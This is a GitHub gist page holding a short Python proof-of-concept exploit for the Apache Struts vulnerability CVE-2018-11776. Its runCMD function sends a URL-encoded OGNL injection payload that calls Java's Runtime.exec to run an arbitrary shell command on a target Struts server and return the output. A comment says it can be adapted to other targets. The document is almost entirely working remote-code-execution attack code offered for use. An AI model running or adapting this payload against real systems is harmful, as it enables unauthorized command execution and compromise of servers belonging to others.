xia0AL
xia0AL
/ CVE-2018-11776-PoC.py
Created
July 16, 2019 01:46
— forked from atucom/CVE-2018-11776-PoC.py
Simple PoC for the Apache Struts vuln CVE-2018-11776
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| # Simple PoC for the Apache Struts vuln CVE-2018-11776 | |
| # this currently works on the struts showcase app but can easily be adapted to anything | |
| # Thanks to https://github.com/jas502n/St2-057 for working OGNL statements :D (proper URL encoding REALLY matters) | |
| # @atucom | |
| def runCMD(command): | |
| target = 'http://192.168.235.181:8080/struts3-showcase/' | |
| payload = '%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27' + command + '%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action' | |
| return requests.get(target + payload).text |